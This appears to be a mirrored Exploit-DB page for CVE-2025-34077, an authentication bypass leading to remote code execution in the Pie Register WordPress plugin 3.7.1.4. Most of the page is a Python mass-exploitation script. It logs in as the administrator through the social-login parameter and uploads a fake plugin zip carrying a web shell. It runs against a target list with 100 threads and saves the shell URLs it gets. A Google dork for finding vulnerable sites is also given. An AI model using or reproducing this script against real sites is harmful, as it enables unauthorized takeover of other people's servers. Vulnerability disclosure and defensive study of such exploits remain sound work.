Pie Register WordPress Plugin 3.7.1.4 – Authentication Bypass to RCE...

Exploit Details

Basic Information

Exploit Title	Pie Register WordPress Plugin 3.7.1.4 – Authentication Bypass to RCE
Exploit ID	EDB-ID:52370
Type	exploitdb
Published	2025-07-22T00:00:00
Modified	2025-07-22T00:00:00

CVSS Information

CVSS Score	10.0
Severity	CRITICAL
Vector	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:H/VI:H/SI:H/VA:H/SA:H

CVE Information

CVE-2025-34077

Exploit Description

Exploit……

Exploit Code

# Exploit Title: Pie Register WordPress Plugin 3.7.1.4 – Authentication Bypass to RCE

# Google Dork: inurl:/wp-content/plugins/pie-register/

# Date: 2025-07-09

# Exploit Author: Md Amanat Ullah (xSwads)

# Vendor Homepage: https://wordpress.org/plugins/pie-register/

# Software Link:

https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip

# Version: <= 3.7.1.4

# Tested on: Ubuntu 22.04

# CVE: CVE-2025-34077
#!/usr/bin/env python3

import requests

import zipfile

import io

import sys

from concurrent.futures import ThreadPoolExecutor, as_completed

from colorama import Fore, Style, init

from threading import Lock

init(autoreset=True)
SHELL_PHP = “”

PLUGIN_DIR = “evilplugin”

ZIP_NAME = “evilplugin.zip”

SHELL_FILE = “shell.php”

OUTPUT_FILE = “Shells.txt”

HEADERS = {‘User-Agent’: ‘Mozilla/5.0’}

TIMEOUT = 10

lock = Lock()
def FilterURLS(site):

    site = site.strip()

    if not site.startswith((‘http://’, ‘https://’)):

        site = ‘http://’ + site

    if not site.endswith(‘/’):

        site += ‘/’

    return site
def make_shell_zip():

    buf = io.BytesIO()

    with zipfile.ZipFile(buf, ‘w’) as z:

        z.writestr(f”{PLUGIN_DIR}/{PLUGIN_DIR}.php”, ““)

        z.writestr(f”{PLUGIN_DIR}/{SHELL_FILE}”, SHELL_PHP)

    buf.seek(0)

    return buf
def exploit(target):

    target = FilterURLS(target)

    session = requests.Session()

    data = {“social_site”: “true”, “user_id_social_site”: “1”}

    try:

        r = session.post(f”{target}?pr_social_login=1″, data=data, headers=HEADERS, timeout=TIMEOUT)

    except:

        print(f”{Fore.RED}[Failed] – {target}”)

        return
    if not session.cookies:

        print(f”{Fore.RED}[Failed] – {target}”)

        return

    files = {“pluginzip”: (ZIP_NAME, make_shell_zip(), “application/zip”)}

    try:

        upload = session.post(f”{target}wp-admin/plugin-install.php?upload”, files=files, headers=HEADERS, timeout=TIMEOUT)

    except:

        print(f”{Fore.RED}[Failed] – {target}”)

        return
    if “Plugin installed successfully” in upload.text:

        shell_url = f”{target}wp-content/plugins/{PLUGIN_DIR}/{SHELL_FILE}”

        print(f”{Fore.GREEN}[Exploited] – {shell_url}”)

        with lock:

            with open(OUTPUT_FILE, “a”) as f:

                f.write(shell_url + “\n”)

    else:

        print(f”{Fore.RED}[Failed] – {target}”)
def main(targets_file):

    with open(targets_file, “r”) as f:

        targets = [line.strip() for line in f if line.strip()]
    with ThreadPoolExecutor(max_workers=100) as executor:

        futures = [executor.submit(exploit, target) for target in targets]

        for _ in as_completed(futures):

            pass
if __name__ == “__main__”:

    if len(sys.argv) != 2:

        print(f”Usage: {sys.argv[0]} list.txt”)

        sys.exit(1)
    main(sys.argv[1])

View Full Exploit Details

Exploit Details

Basic Information

CVSS Information

CVE Information

Exploit Description

Exploit Code

💭 Join the Security Discussion ❌ Cancel Reply